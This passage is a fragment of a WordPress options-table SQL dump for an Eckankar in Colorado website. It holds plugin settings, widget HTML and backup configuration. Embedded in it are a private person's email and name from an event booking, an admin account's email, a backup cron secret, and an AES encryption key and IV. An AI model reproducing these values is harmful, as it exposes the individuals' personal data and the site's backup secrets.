Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268463;s:11:\"invoice_key\";s:32:\"8bf86b1dfc93a18ac257fbd8abb94ea4\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6990801,'updraft_lock_c862ff8ef126','1672445965','no'),(103,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_custom_html','a:8:{i:3;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:913:\"<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-blog-6 boldgrid-section dynamic-gridblock\" style=\"margin: -22px;\" custom-classes=\"\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 2px;\">\r\n<div class=\"col-md-11 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"font-size: 39px; color: #23507d;\"><img class=\"alignnone wp-image-1675 bg-img\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-header-symbol.png\" alt=\"\" width=\"45\" height=\"46\"> ECKANKAR IN COLORADO</p>\r\n\r\n</div>\r\n<div class=\"col-md-1 col-sm-6 col-xs-12 align-column-center\"></div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 0px;\">\r\n<div class=\"col-md-8 col-sm-8 col-xs-12\" style=\"padding: 1em;\">\r\n<h3 class=\"site-description h5 alt-font\" style=\"font-weight: 600; font-size: 20px; line-height: 0.5em; text-align: left;  data-font-weight=\"600\">The Path of Spiritual Freedom</h3>\r\n</div>\r\n\";}i:4;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:761:\"<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\" style=\"padding-top: 0em;\">\r\n<p class=\"\" style=\"font-weight: 600; font-size: 34px; color: #23507d; margin-top: 0px; margin-left: -23px;\" data-font-weight=\"600\"><img class=\"alignnone wp-image-1675\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-header-symbol.png\" alt=\"\" width=\"45\" height=\"46\"> ECKANKAR IN COLORADO</p>\r\n\r\n<div>\r\n<p class=\"\" style=\"font-weight: 400; font-size: 20px; padding: 0em; margin-left: 55px; margin-top: -21px; letter-spacing: 5px; margin-left: 34px;\" data-font-weight=\"600\">The Path of Spiritual Freedom</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n\";}s:12:\"_multiwidget\";i:1;i:6;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:833:\"<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"margin-top: 145px; margin-bottom: 350px;\">\r\n<p class=\"hidden-mobile\" style=\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\">ECKANKAR</p>\r\n<p class=\"hidden-mobile\" style=\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\"><br>\r\n<span style=\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\">THE PATH OF SPIRITUAL FREEDOM</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\";}i:8;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:399:\"<p class=\"\" style=\"text-align: center;\"><a href=\"https://eckankar-colorado.org/contact-us/\"><br>\r\n<strong>Contact Us</strong></a>&nbsp; | <a href=\"https://eckankar-colorado.org/\"> <strong>Eckankar In Colorado Website</strong></a></p>\r\n<p class=\"\" style=\"text-align: center;\">Copyright © 2009 - 2019 Colorado Satsang Society, Inc.,<br>\r\nA Chartered Affiliate of ECKANKAR<br>\r\nAll rights reserved</p>\";}i:10;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:626:\"<div style=\"margin-top: 25px;\">\r\n<div>\r\n<p class=\"mod-reset\"><a href=\"https://www.eckankar-colorado.org\"><img class=\"alignleft wp-image-2712 size-full\" style=\"margin-top: -4px; margin-right: 11px; margin-left: -35px;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2016/06/ek-header-symbol.png\" alt=\"Eckankar In Colorado\" width=\"50\" height=\"51\"></a></p>\r\n<p class=\"\"><span style=\"color: #23507d; font-size: 2.5em; font-weight: bold;\">Eckankar In Colorado</span><br>\r\n<span style=\"font-size: 1.35em; color: #777777; letter-spacing: 0.16em; margin-left: 2px;\"> The Path of Spiritual Freedom</span></p>\r\n</div>\r\n</div>\";}i:12;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:0:\"\";}i:14;a:2:{s:5:\"title\";s:0:\"\";s:7:\"content\";s:530:\"<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"bg-font-family-alt color1-color\" style=\"text-align: center;\"><span style=\"font-family: arial black, sans-serif; font-size: 24pt;\">Weather Alert</span><br>\r\n<strong><span style=\"font-size: 18pt;\">The Colorado ECK Temple is closed today due to weather conditions.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\";}}','yes'),(113,'boldgrid_settings','a:7:{s:7:\"library\";a:2:{s:35:\"boldgrid-backup/boldgrid-backup.php\";s:9:\"2.13.10.0\";s:47:\"post-and-page-builder/post-and-page-builder.php\";s:9:\"2.13.11.0\";}s:15:\"plugins_checked\";a:8:{s:35:\"boldgrid-backup/boldgrid-backup.php\";a:49:{s:5:\"1.9.3\";i:1562174615;s:6:\"1.10.3\";i:1563634443;s:6:\"1.10.4\";i:1564678693;s:6:\"1.10.5\";i:1564714730;s:6:\"1.10.6\";i:1566771080;s:6:\"1.11.0\";i:1567805755;s:6:\"1.11.1\";i:1568254562;s:6:\"1.11.4\";i:1569605401;s:6:\"1.11.5\";i:1570159502;s:6:\"1.11.6\";i:1570588298;s:6:\"1.11.7\";i:1570763883;s:6:\"1.11.8\";i:1571173755;s:6:\"1.12.1\";i:1575517412;s:6:\"1.12.2\";i:1576729381;s:6:\"1.12.3\";i:1577551492;s:6:\"1.12.4\";i:1578956143;s:6:\"1.12.5\";i:1579119072;s:6:\"1.12.6\";i:1579542642;s:6:\"1.13.0\";i:1581269937;s:6:\"1.13.1\";i:1582137409;s:6:\"1.13.2\";i:1586272598;s:6:\"1.13.3\";i:1590114769;s:6:\"1.13.4\";i:1590114936;s:6:\"1.13.5\";i:1590763440;s:6:\"1.13.6\";i:1591137422;s:6:\"1.13.7\";i:1591557942;s:6:\"1.13.8\";i:1592951153;s:7:\"1.13.10\";i:1593549295;s:7:\"1.13.12\";i:1594089688;s:6:\"1.14.1\";i:1595441463;s:6:\"1.14.2\";i:1597245336;s:6:\"1.14.3\";i:1597591462;s:6:\"1.14.4\";i:1601065970;s:6:\"1.14.5\";i:1601066031;s:6:\"1.14.6\";i:1605714762;s:6:\"1.14.8\";i:1607527956;s:6:\"1.14.9\";i:1607527989;s:7:\"1.14.10\";i:1613583690;s:7:\"1.14.11\";i:1616094783;s:7:\"1.14.12\";i:1623771115;s:7:\"1.14.13\";i:1646353770;s:7:\"1.14.14\";i:1646607845;s:6:\"1.15.0\";i:1651161436;s:6:\"1.15.1\";i:1653661413;s:6:\"1.15.2\";i:1666299400;s:6:\"1.15.4\";i:1674583374;s:6:\"1.15.5\";i:1678987092;s:6:\"1.15.6\";i:1685674436;s:6:\"1.15.7\";i:1699375558;}s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";a:15:{s:5:\"1.1.2\";i:1570159464;s:5:\"1.2.1\";i:1575516865;s:5:\"1.3.0\";i:1575517412;s:5:\"1.3.1\";i:1581269937;s:5:\"1.3.3\";i:1590114925;s:5:\"1.4.0\";i:1594213762;s:5:\"1.5.1\";i:1597591439;s:5:\"1.5.2\";i:1602788190;s:5:\"1.5.3\";i:1602788230;s:5:\"1.5.4\";i:1606242481;s:5:\"1.5.5\";i:1607527974;s:5:\"1.5.6\";i:1613584474;s:5:\"1.5.7\";i:1614287961;s:5:\"1.5.8\";i:1618503474;s:5:\"1.5.9\";i:1699375558;}s:47:\"boldgrid-inspirations/boldgrid-inspirations.php\";a:27:{s:5:\"2.0.3\";i:1562175050;s:5:\"2.0.4\";i:1564259341;s:5:\"2.0.5\";i:1564714735;s:5:\"2.0.6\";i:1564714774;s:5:\"2.0.7\";i:1567629309;s:5:\"2.1.0\";i:1567629322;s:5:\"2.1.1\";i:1568254562;s:5:\"2.2.0\";i:1570824557;s:5:\"2.2.1\";i:1575516914;s:5:\"2.2.2\";i:1576729369;s:5:\"2.3.0\";i:1582482646;s:5:\"2.3.1\";i:1586272635;s:5:\"2.4.0\";i:1591133268;s:5:\"2.4.1\";i:1591928346;s:5:\"2.4.2\";i:1597161804;s:5:\"2.4.3\";i:1599070843;s:5:\"2.4.4\";i:1604159181;s:5:\"2.5.0\";i:1605714903;s:5:\"2.5.1\";i:1607527863;s:5:\"2.5.2\";i:1608574676;s:5:\"2.6.0\";i:1611779579;s:5:\"2.6.1\";i:1618420324;s:5:\"2.6.2\";i:1620078195;s:5:\"2.6.3\";i:1632611392;s:5:\"2.6.4\";i:1640985062;s:5:\"2.6.5\";i:1658156561;s:5:\"2.7.1\";i:1693768958;}s:47:\"post-and-page-builder/post-and-page-builder.php\";a:41:{s:6:\"1.10.3\";i:1562898176;s:6:\"1.10.4\";i:1563634455;s:6:\"1.10.5\";i:1564714750;s:6:\"1.10.6\";i:1566771042;s:6:\"1.11.0\";i:1567629322;s:6:\"1.11.1\";i:1568254562;s:6:\"1.11.2\";i:1575517326;s:6:\"1.12.1\";i:1581269937;s:6:\"1.12.2\";i:1584910127;s:6:\"1.13.0\";i:1592951277;s:6:\"1.13.1\";i:1595441475;s:6:\"1.13.2\";i:1595949165;s:6:\"1.13.3\";i:1599070259;s:6:\"1.13.4\";i:1607527907;s:6:\"1.13.6\";i:1608139656;s:6:\"1.14.0\";i:1628523475;s:6:\"1.14.1\";i:1630265602;s:6:\"1.14.2\";i:1635271377;s:6:\"1.15.0\";i:1637425021;s:6:\"1.15.2\";i:1643778731;s:6:\"1.16.0\";i:1643778797;s:6:\"1.17.0\";i:1646353814;s:6:\"1.17.1\";i:1649166743;s:6:\"1.18.0\";i:1650323650;s:6:\"1.19.0\";i:1653417231;s:6:\"1.19.1\";i:1654013291;s:6:\"1.20.0\";i:1658860106;s:6:\"1.20.1\";i:1658860477;s:6:\"1.21.2\";i:1664472645;s:6:\"1.21.3\";i:1667413560;s:6:\"1.22.0\";i:1670525346;s:6:\"1.22.1\";i:1671041698;s:6:\"1.22.2\";i:1677733945;s:6:\"1.23.0\";i:1680276656;s:6:\"1.23.1\";i:1682096875;s:6:\"1.23.2\";i:1685030242;s:6:\"1.24.0\";i:1685030303;s:6:\"1.24.1\";i:1689736856;s:6:\"1.24.2\";i:1693768958;s:6:\"1.25.0\";i:1695307802;s:6:\"1.25.1\";i:1699375558;}s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";a:6:{s:5:\"1.0.2\";i:1575517404;s:5:\"1.0.4\";i:1607527933;s:5:\"1.0.5\";i:1651161408;s:5:\"1.0.6\";i:1678987060;s:5:\"1.1.1\";i:1698188504;s:5:\"1.1.2\";i:1699375558;}s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";a:11:{s:5:\"1.6.2\";i:1565996469;s:5:\"1.6.3\";i:1576445130;s:5:\"1.6.4\";i:1584304122;s:5:\"1.6.5\";i:1597161777;s:5:\"1.6.7\";i:1599070721;s:5:\"1.6.8\";i:1607399239;s:5:\"1.6.9\";i:1613584512;s:6:\"1.6.10\";i:1675979284;s:6:\"1.6.11\";i:1681505293;s:6:\"1.6.12\";i:1683664541;s:6:\"1.6.13\";i:1699375558;}s:31:\"boldgrid-gallery/wc-gallery.php\";a:2:{s:3:\"1.5\";i:1595949097;s:5:\"1.5.1\";i:1640985062;}s:37:\"boldgrid-staging/boldgrid-staging.php\";a:1:{s:5:\"1.5.1\";i:1693768958;}}s:20:\"boldgrid_menu_option\";i:0;s:24:\"boldgrid_feedback_optout\";s:1:\"0\";s:15:\"release_channel\";s:6:\"stable\";s:21:\"theme_release_channel\";s:6:\"stable\";s:10:\"autoupdate\";a:3:{s:6:\"wpcore\";a:5:{s:3:\"all\";b:0;s:5:\"major\";b:0;s:5:\"minor\";b:1;s:3:\"dev\";b:0;s:11:\"translation\";b:0;}s:7:\"plugins\";a:49:{s:7:\"default\";b:0;s:19:\"404page/404page.php\";b:0;s:27:\"autoptimize/autoptimize.php\";b:0;s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";b:0;s:31:\"boldgrid-gallery/wc-gallery.php\";b:0;s:47:\"boldgrid-inspirations/boldgrid-inspirations.php\";b:0;s:37:\"boldgrid-staging/boldgrid-staging.php\";b:0;s:31:\"kt-tinymce-color-grid/index.php\";b:0;s:71:\"change-password-protected-message/change-password-protected-message.php\";b:0;s:31:\"code-snippets/code-snippets.php\";b:0;s:37:\"disable-comments/disable-comments.php\";b:0;s:33:\"duplicate-post/duplicate-post.php\";b:0;s:45:\"enable-media-replace/enable-media-replace.php\";b:0;s:54:\"erident-custom-login-and-dashboard/er-custom-login.php\";b:0;s:23:\"folders-pro/folders.php\";b:0;s:43:\"ga-google-analytics/ga-google-analytics.php\";b:0;s:36:\"google-sitemap-generator/sitemap.php\";b:0;s:65:\"html-editor-syntax-highlighter/html-editor-syntax-highlighter.php\";b:0;s:35:\"insert-headers-and-footers/ihaf.php\";b:0;s:27:\"ninja-forms/ninja-forms.php\";b:0;s:39:\"content-protector/content-protector.php\";b:0;s:30:\"gallery-by-supsystic/index.php\";b:0;s:27:\"popup-maker/popup-maker.php\";b:0;s:47:\"post-and-page-builder/post-and-page-builder.php\";b:0;s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";b:0;s:30:\"protect-the-children/index.php\";b:0;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";b:0;s:45:\"remember-me-controls/remember-me-controls.php\";b:0;s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";b:0;s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";b:0;s:42:\"scripts-to-footerphp/scripts-to-footer.php\";b:0;s:39:\"simple-custom-css/simple-custom-css.php\";b:0;s:32:\"simple-download-monitor/main.php\";b:0;s:51:\"simple-google-recaptcha/simple-google-recaptcha.php\";b:0;s:35:\"tabs-responsive/tabs-responsive.php\";b:0;s:43:\"the-events-calendar/the-events-calendar.php\";b:0;s:43:\"events-calendar-pro/events-calendar-pro.php\";b:0;s:37:\"tinymce-advanced/tinymce-advanced.php\";b:0;s:35:\"boldgrid-backup/boldgrid-backup.php\";b:0;s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";b:0;s:27:\"updraftplus/updraftplus.php\";b:0;s:37:\"user-role-editor/user-role-editor.php\";b:0;s:23:\"wordfence/wordfence.php\";b:0;s:27:\"wp-optimize/wp-optimize.php\";b:0;s:35:\"wp-fastest-cache/wpFastestCache.php\";b:0;s:24:\"wpforms-lite/wpforms.php\";b:0;s:47:\"better-search-replace/better-search-replace.php\";b:0;s:41:\"password-protected/password-protected.php\";b:0;s:43:\"wp-maintenance-mode/wp-maintenance-mode.php\";b:0;}s:6:\"themes\";a:7:{s:7:\"default\";b:0;s:14:\"boldgrid-hydra\";b:0;s:14:\"boldgrid-wedge\";b:0;s:14:\"twentynineteen\";b:0;s:15:\"twentyseventeen\";b:0;s:13:\"twentysixteen\";b:0;s:12:\"twentytwenty\";b:0;}}}','yes'),(118,'widget_boldgrid_component_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(119,'widget_boldgrid_component_postlist','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(120,'boldgrid_attribution_rebuild','1','yes'),(121,'boldgrid_staging_boldgrid_attribution_rebuild','1','yes'),(122,'boldgrid_attribution_upgraded_to_cpt','1','yes'),(123,'boldgrid_editor','a:11:{s:19:\"has_flushed_rewrite\";b:1;s:19:\"has_checked_version\";i:0;s:7:\"notices\";a:2:{s:13:\"editor_choice\";a:1:{s:9:\"dismissed\";b:1;}s:10:\"bg_control\";a:1:{s:9:\"dismissed\";b:1;}}s:21:\"displayed_v1.3_notice\";i:1;s:18:\"count_usage_blocks\";i:784;s:22:\"block_default_industry\";s:6:\"design\";s:13:\"custom_colors\";a:42:{i:0;s:7:\"#eadbdb\";i:1;s:7:\"#f1f3f3\";i:2;s:7:\"#eaeaea\";i:3;s:7:\"#e3ebf7\";i:4;s:21:\"rgba(41,100,219,0.38)\";i:5;s:21:\"rgba(228,238,246,0.7)\";i:6;s:7:\"#cee4ed\";i:7;s:22:\"rgba(249,249,250,0.92)\";i:8;s:7:\"#faf3ef\";i:9;s:22:\"rgba(243,246,251,0.92)\";i:10;s:22:\"rgba(228,238,246,0.18)\";i:11;s:18:\"rgba(62,62,62,0.9)\";i:12;s:7:\"#f0f0f9\";i:13;s:7:\"#fae2d0\";i:14;s:7:\"#edf0f7\";i:15;s:7:\"#edf0f7\";i:16;s:7:\"#eaeaea\";i:17;s:22:\"rgba(255,255,255,0.28)\";i:18;s:7:\"#fef1e1\";i:19;s:7:\"#f3f3fb\";i:20;s:7:\"#f3e1e1\";i:21;s:7:\"#b54eba\";i:22;s:22:\"rgba(255,255,255,0.22)\";i:23;s:22:\"rgba(255,255,255,0.39)\";i:24;s:22:\"rgba(255,255,255,0.42)\";i:25;s:22:\"rgba(255,255,255,0.84)\";i:26;s:7:\"#f7e4d8\";i:27;s:21:\"rgba(255,255,255,0.4)\";i:28;s:22:\"rgba(255,255,255,0.66)\";i:29;s:7:\"#fef9f0\";i:30;s:7:\"#ebecf7\";i:31;s:7:\"#161616\";i:32;s:7:\"#3e3e3e\";i:33;s:7:\"#fcefe7\";i:34;s:7:\"#006f8e\";i:35;s:19:\"rgba(51,51,51,0.28)\";i:36;s:7:\"#cd8a0e\";i:37;s:7:\"#ddf0fd\";i:38;s:22:\"rgba(255,255,255,0.68)\";i:39;s:7:\"#f6f6f7\";i:40;s:17:\"rgb(41, 100, 219)\";i:41;s:22:\"rgba(255,255,255,0.72)\";}s:12:\"preview_meta\";a:2:{s:8:\"template\";N;s:24:\"boldgrid_hide_page_title\";N;}s:14:\"default_editor\";a:12:{s:4:\"post\";s:5:\"bgppb\";s:4:\"page\";s:5:\"bgppb\";s:5:\"popup\";s:7:\"default\";s:14:\"bg_attribution\";s:5:\"bgppb\";s:8:\"bg_block\";s:5:\"bgppb\";s:13:\"sdm_downloads\";s:7:\"default\";s:11:\"tribe_venue\";s:7:\"default\";s:15:\"tribe_organizer\";s:7:\"default\";s:12:\"tribe_events\";s:7:\"default\";s:10:\"mec-events\";s:5:\"bgppb\";s:15:\"protected_areas\";s:5:\"bgppb\";s:12:\"popupbuilder\";s:5:\"bgppb\";}s:17:\"activated_version\";s:6:\"1.19.1\";s:15:\"preview_page_id\";i:266753;}','yes'),(124,'theme_mods_twentynineteen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1562170525;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(125,'boldgrid_backup_id','9ea03425','no'),(126,'boldgrid_backup_settings','a:25:{s:8:\"schedule\";a:10:{s:10:\"dow_sunday\";i:0;s:10:\"dow_monday\";i:0;s:11:\"dow_tuesday\";i:0;s:13:\"dow_wednesday\";i:1;s:12:\"dow_thursday\";i:0;s:10:\"dow_friday\";i:0;s:12:\"dow_saturday\";i:0;s:5:\"tod_h\";i:3;s:5:\"tod_m\";s:2:\"00\";s:5:\"tod_a\";s:2:\"AM\";}s:15:\"retention_count\";i:5;s:18:\"notification_email\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"notifications\";a:3:{s:6:\"backup\";i:1;s:7:\"restore\";i:1;s:10:\"site_check\";b:1;}s:11:\"auto_backup\";i:1;s:13:\"auto_rollback\";i:1;s:6:\"remote\";a:1:{s:5:\"local\";a:1:{s:7:\"enabled\";b:1;}}s:14:\"exclude_tables\";a:0:{}s:24:\"folder_exclusion_include\";s:18:\"WPCORE,/wp-content\";s:24:\"folder_exclusion_exclude\";s:17:\".git,node_modules\";s:16:\"backup_directory\";s:29:\"/home/eckank5/boldgrid_backup\";s:11:\"cron_secret\";s:64:\"d30eb29c99331c242386fc351fae7114031cf79d202ee3c9aa0b2f11d8f8e9a1\";s:10:\"site_check\";a:4:{s:7:\"enabled\";b:1;s:6:\"logger\";b:1;s:13:\"auto_recovery\";b:0;s:8:\"interval\";i:15;}s:9:\"scheduler\";s:4:\"cron\";s:11:\"crons_added\";b:1;s:15:\"crontab_version\";s:5:\"1.6.4\";s:19:\"exclude_tables_type\";s:4:\"full\";s:21:\"folder_exclusion_type\";s:4:\"full\";s:7:\"updated\";i:1692473794;s:10:\"encrypt_db\";b:0;s:7:\"openssl\";a:3:{s:6:\"cipher\";s:11:\"AES-256-CBC\";s:2:\"iv\";s:32:\"53c355e8d158a5ec41e66307fff5ab2f\";s:3:\"key\";s:64:\"e83e21938b2f9d1e6e74d2f771092913333bc077fd567fb2a23e64c0818788ed\";}s:11:\"auto_update\";a:5:{s:22:\"timely-updates-enabled\";s:1:\"0\";s:4:\"days\";s:1:\"0\";s:6:\"wpcore\";a:5:{s:3:\"all\";s:1:\"0\";s:5:\"major\";s:1:\"0\";s:5:\"minor\";s:1:\"1\";s:3:\"dev\";s:1:\"0\";s:11:\"translation\";s:1:\"0\";}s:7:\"plugins\";a:45:{s:7:\"default\";s:1:\"0\";s:37:\"tinymce-advanced/tinymce-advanced.php\";s:1:\"0\";s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";s:1:\"0\";s:27:\"autoptimize/autoptimize.php\";s:1:\"0\";s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";s:1:\"0\";s:31:\"kt-tinymce-color-grid/index.php\";s:1:\"0\";s:31:\"code-snippets/code-snippets.php\";s:1:\"0\";s:37:\"disable-comments/disable-comments.php\";s:1:\"0\";s:23:\"folders-pro/folders.php\";s:1:\"0\";s:43:\"ga-google-analytics/ga-google-analytics.php\";s:1:\"0\";s:65:\"html-editor-syntax-highlighter/html-editor-syntax-highlighter.php\";s:1:\"0\";s:43:\"lj-maintenance-mode/lj-maintenance-mode.php\";s:1:\"0\";s:41:\"mec-fluent-layouts/mec-fluent-layouts.php\";s:1:\"0\";s:30:\"modern-events-calendar/mec.php\";s:1:\"0\";s:35:\"modula-best-grid-gallery/Modula.php\";s:1:\"0\";s:27:\"ninja-forms/ninja-forms.php\";s:1:\"0\";s:55:\"styler-for-ninja-forms-lite/ninja-forms-styler-lite.php\";s:1:\"0\";s:39:\"content-protector/content-protector.php\";s:1:\"0\";s:39:\"plugin-notes-plus/plugin-notes-plus.php\";s:1:\"0\";s:31:\"popup-builder/popup-builder.php\";s:1:\"0\";s:47:\"post-and-page-builder/post-and-page-builder.php\";s:1:\"0\";s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";s:1:\"0\";s:30:\"protect-the-children/index.php\";s:1:\"0\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:1:\"0\";s:45:\"remember-me-controls/remember-me-controls.php\";s:1:\"0\";s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";s:1:\"0\";s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";s:1:\"0\";s:42:\"scripts-to-footerphp/scripts-to-footer.php\";s:1:\"0\";s:39:\"simple-custom-css/simple-custom-css.php\";s:1:\"0\";s:24:\"simple-history/index.php\";s:1:\"0\";s:19:\"404page/404page.php\";s:1:\"0\";s:35:\"tabs-responsive/tabs-responsive.php\";s:1:\"0\";s:35:\"boldgrid-backup/boldgrid-backup.php\";s:1:\"0\";s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";s:1:\"0\";s:27:\"updraftplus/updraftplus.php\";s:1:\"0\";s:23:\"wordfence/wordfence.php\";s:1:\"0\";s:27:\"wp-optimize/wp-optimize.php\";s:1:\"0\";s:35:\"insert-headers-and-footers/ihaf.php\";s:1:\"0\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:1:\"0\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:1:\"0\";s:63:\"www-xml-sitemap-generator-org/www-xml-sitemap-generator-org.php\";s:1:\"0\";s:33:\"duplicate-post/duplicate-post.php\";s:1:\"0\";s:47:\"boldgrid-inspirations/boldgrid-inspirations.php\";s:1:\"0\";s:37:\"boldgrid-staging/boldgrid-staging.php\";s:1:\"0\";s:41:\"password-protected/password-protected.php\";s:1:\"0\";}s:6:\"themes\";a:4:{s:7:\"default\";s:1:\"0\";s:14:\"boldgrid-hydra\";s:1:\"0\";s:17:\"twentytwentythree\";s:1:\"0\";s:15:\"twentytwentytwo\";s:1:\"0\";}}s:10:\"compressor\";s:7:\"php_zip\";s:17:\"filelist_analysis\";i:0;s:17:\"compression_level\";s:1:\"6\";}','no'),(131,'boldgrid_backup_in_progress_data','a:7:{s:6:\"status\";s:22:\"Backing up database...\";s:12:\"log_filename\";s:22:\"archive-1700585383.log\";s:3:\"pid\";i:152001;s:10:\"start_time\";i:1700585383;s:7:\"trigger\";s:38:\"john-admin-96 (nadazipought@zilch.org)\";s:6:\"tables\";a:98:{i:0;s:28:\"wpcl_actionscheduler_actions\";i:1;s:27:\"wpcl_actionscheduler_claims\";i:2;s:27:\"wpcl_actionscheduler_groups\";i:3;s:25:\"wpcl_actionscheduler_logs\";i:4;s:13:\"wpcl_cf_forms\";i:5;s:20:\"wpcl_cf_pro_messages\";i:6;s:22:\"wpcl_cf_queue_failures\";i:7;s:18:\"wpcl_cf_queue_jobs\";i:8;s:16:\"wpcl_commentmeta\";i:9;s:13:\"wpcl_comments\";i:10;s:25:\"wpcl_ff_scheduled_actions\";i:11;s:29:\"wpcl_fluentform_entry_details\";i:12;s:30:\"wpcl_fluentform_form_analytics\";i:13;s:25:\"wpcl_fluentform_form_meta\";i:14;s:21:\"wpcl_fluentform_forms\";i:15;s:20:\"wpcl_fluentform_logs\";i:16;s:31:\"wpcl_fluentform_submission_meta\";i:17;s:27:\"wpcl_fluentform_submissions\";i:18;s:18:\"wpcl_gg_attributes\";i:19;s:17:\"wpcl_gg_galleries\";i:20;s:27:\"wpcl_gg_galleries_resources\";i:21;s:14:\"wpcl_gg_photos\";i:22;s:21:\"wpcl_gg_settings_sets\";i:23;s:12:\"wpcl_gg_tags\";i:24;s:10:\"wpcl_links\";i:25;s:18:\"wpcl_mec_attendees\";i:26;s:26:\"wpcl_mec_booking_attendees\";i:27;s:17:\"wpcl_mec_bookings\";i:28;s:14:\"wpcl_mec_dates\";i:29;s:15:\"wpcl_mec_events\";i:30;s:20:\"wpcl_mec_occurrences\";i:31;s:14:\"wpcl_mec_users\";i:32;s:16:\"wpcl_ms_snippets\";i:33;s:20:\"wpcl_nf3_action_meta\";i:34;s:16:\"wpcl_nf3_actions\";i:35;s:15:\"wpcl_nf3_chunks\";i:36;s:19:\"wpcl_nf3_field_meta\";i:37;s:15:\"wpcl_nf3_fields\";i:38;s:18:\"wpcl_nf3_form_meta\";i:39;s:14:\"wpcl_nf3_forms\";i:40;s:20:\"wpcl_nf3_object_meta\";i:41;s:16:\"wpcl_nf3_objects\";i:42;s:22:\"wpcl_nf3_relationships\";i:43;s:17:\"wpcl_nf3_upgrades\";i:44;s:12:\"wpcl_options\";i:45;s:22:\"wpcl_plugin_notes_plus\";i:46;s:13:\"wpcl_postmeta\";i:47;s: